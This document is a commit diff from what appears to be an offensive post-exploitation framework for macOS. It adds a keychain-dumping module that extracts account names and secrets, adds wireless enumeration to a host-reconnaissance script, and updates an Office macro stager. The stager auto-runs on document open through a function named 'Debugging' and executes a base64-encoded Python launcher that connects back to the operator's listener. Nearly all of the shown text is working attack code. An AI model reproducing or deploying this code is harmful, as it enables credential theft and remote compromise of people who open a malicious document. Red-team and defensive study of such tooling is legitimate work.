Merge branch 'import-au-master' into dev

2018-03-14 14:03:36 -04:00 · 2018-03-14 14:03:36 -04:00 · ea08326c72
parent 23c4d40ee5 1957c28368
commit ea08326c72
3 changed files with 190 additions and 25 deletions
--- a/lib/modules/python/collection/osx/keychaindump_decrypt.py
+++ b/lib/modules/python/collection/osx/keychaindump_decrypt.py
@ -0,0 +1,91 @@
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Sandbox-Keychain-Dump',
+
+            # list of one or more authors for the module
+            'Author': ['@import-au'],
+
+            # more verbose multi-line description of the module
+            'Description': ("Uses Apple Security utility to dump the contents of the keychain. "
+                            "WARNING: Will prompt user for access to each key."
+                            "On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key."),
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # the module language
+            'Language' : 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion' : '2.6',
+
+            # list of any references/other comments
+            'Comments': [
+                ""
+            ]
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'OutFile' : {
+                'Description': 'File to output AppleScript to, otherwise displayed on the screen.',
+                'Required': False,
+                'Value': ''
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+
+        script = r"""
+import subprocess
+import re
+
+process = subprocess.Popen('/usr/bin/security dump-keychain -d', stdout=subprocess.PIPE, shell=True)
+keychain = process.communicate()
+find_account = re.compile('0x00000007\s\<blob\>\=\"([^\"]+)\"\n.*\n.*\"acct\"\<blob\>\=\"([^\"]+)\"\n.*\n.*\n.*\n\s+\"desc\"\<blob\>\=([^\n]+)\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\ndata\:\n([^\n]+)')
+accounts = find_account.findall(keychain[0])
+for account in accounts:
+    print("System: " + account[0])
+    print("Description: " + account[2])
+    print("Username: " + account[1])
+    print("Secret: " + account[3])
+
+"""
+        return script
--- a/lib/modules/python/situational_awareness/host/osx/situational_awareness.py
+++ b/lib/modules/python/situational_awareness/host/osx/situational_awareness.py
@ -89,6 +89,7 @@ try:
    import subprocess
    import sys
    import os
+    import time
    from os.path import expanduser
    # Get Home User
    home = str(expanduser("~"))
@ -221,7 +222,7 @@ try:
            HistoryResult = myfile.readlines()
        HistoryCount = HistoryCount * -1
        print "[*] Enumerating User Bash History"
-        print " - Hisotry count size: " + str(len(HistoryResult))
+        print " - History count size: " + str(len(HistoryResult))
        for item in HistoryResult[HistoryCount:]:
            print "    * " + str(item.strip())
        print "[*] SSH commands in History: "
@ -232,6 +233,24 @@ try:
        if Debug:
            print "[!] Error enumerating user bash_history: " + str(e)
        pass
+        
+    # Enum Wireless Connectivity Info
+    try:
+        process = subprocess.Popen(executable="/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport", args="-I", stdout=subprocess.PIPE, shell=True)
+        wireless = process.communicate()
+        if wireless[0] != '':
+            wireless = wireless[0].split('\\n')
+            print "[*] Wireless Connectivity Info:"
+            for x in wireless:
+                if x:
+                    print " - " + str(x.strip())
+                else:
+                    print
+    except Exception as e:
+        if Debug:
+            print "[!] Error enumerating user Wireless Connectivity Info: " + str(e)
+        pass         
+
    # Enum AV / Protection Software

 except Exception as e:
--- a/lib/stagers/osx/macro.py
+++ b/lib/stagers/osx/macro.py
@ -8,9 +8,9 @@ class Stager:
        self.info = {
            'Name': 'AppleScript',

-            'Author': ['@harmj0y'],
+            'Author': ['@harmj0y', '@dchrastil', '@import-au'],

-            'Description': ('An OSX office macro.'),
+            'Description': ('An OSX office macro that supports newer versions of Office.'),

            'Comments': [
                "http://stackoverflow.com/questions/6136798/vba-shell-function-in-office-2011-for-mac"
@ -45,6 +45,11 @@ class Stager:
                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
+            },
+            'Version' : {
+                'Description'   :   'Version of Office for Mac. Accepts values "old" and "new". Old applies to versions of Office for Mac older than 15.26. New applies to versions of Office for Mac 15.26 and newer. Defaults to new.',
+                'Required'      :   True,
+                'Value'         :   'new'
            }
        }

@ -57,16 +62,16 @@ class Stager:
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value
-    
+

    def generate(self):
        def formStr(varstr, instr):
            holder = []
            str1 = ''
            str2 = ''
-            str1 = varstr + ' = "' + instr[:54] + '"' 
+            str1 = varstr + ' = "' + instr[:54] + '"'
            for i in xrange(54, len(instr), 48):
-                holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48])
+                holder.append('\t\t' + varstr + ' = '+ varstr +' + "'+instr[i:i+48])
                str2 = '"\r\n'.join(holder)
            str2 = str2 + "\""
            str1 = str1 + "\r\n"+str2
@ -77,28 +82,78 @@ class Stager:
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        safeChecks = self.options['SafeChecks']['Value']
+        version = self.options['Version']['Value']
+        
+        try:
+            version = str(version).lower()
+        except TypeError:
+            raise TypeError('Invalid version provided. Accepts "new" and "old"')

-        # generate the launcher code
-        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks)
+        # generate the python launcher code
+        pylauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks)

-        if launcher == "":
-            print helpers.color("[!] Error in launcher command generation.")
+        if pylauncher == "":
+            print helpers.color("[!] Error in python launcher command generation.")
            return ""

-        else:
-            launcher = launcher.replace("\"", "\"\"")
-            for match in re.findall(r"'(.*?)'", launcher, re.DOTALL):
-                payload = formStr("cmd", match)
+        # render python launcher into python payload
+        pylauncher = pylauncher.replace("\"", "\"\"")
+        for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL):
+            payload = formStr("cmd", match)

-            macro = """
-Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
+            if version == "old":
+                macro = """
+        #If VBA7 Then
+            Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
+        #Else
+            Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
+        #End If
+        
+        Sub Auto_Open()
+            'MsgBox("Auto_Open()")
+            Debugging
+        End Sub
+        
+        Sub Document_Open()
+            'MsgBox("Document_Open()")
+            Debugging
+        End Sub
+        
+        Public Function Debugging() As Variant
+            On Error Resume Next
+                    #If Mac Then
+                            Dim result As Long
+                            Dim cmd As String
+                            %s
+                            'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
+                            result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
+                    #End If
+        End Function""" %(payload)
+            elif version == "new":
+                macro = """
+        Private Declare PtrSafe Function system Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) as LongPtr
+        
+        Sub Auto_Open()
+            'MsgBox("Auto_Open()")
+            Debugging
+        End Sub
+        
+        Sub Document_Open()
+            'MsgBox("Document_Open()")
+            Debugging
+        End Sub
+        
+        Public Function Debugging() As Variant
+            On Error Resume Next
+                    #If Mac Then
+                            Dim result As LongPtr
+                            Dim cmd As String
+                            %s
+                            'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
+                            result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &", "r")
+                    #End If
+        End Function""" % (payload)
+            else:
+                raise ValueError('Invalid version provided. Accepts "new" and "old"')

-Private Sub Workbook_Open()
-    Dim result As Long
-    Dim cmd As String
-    %s
-    result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
-End Sub
-""" %(payload)
-
-            return macro
+        return macro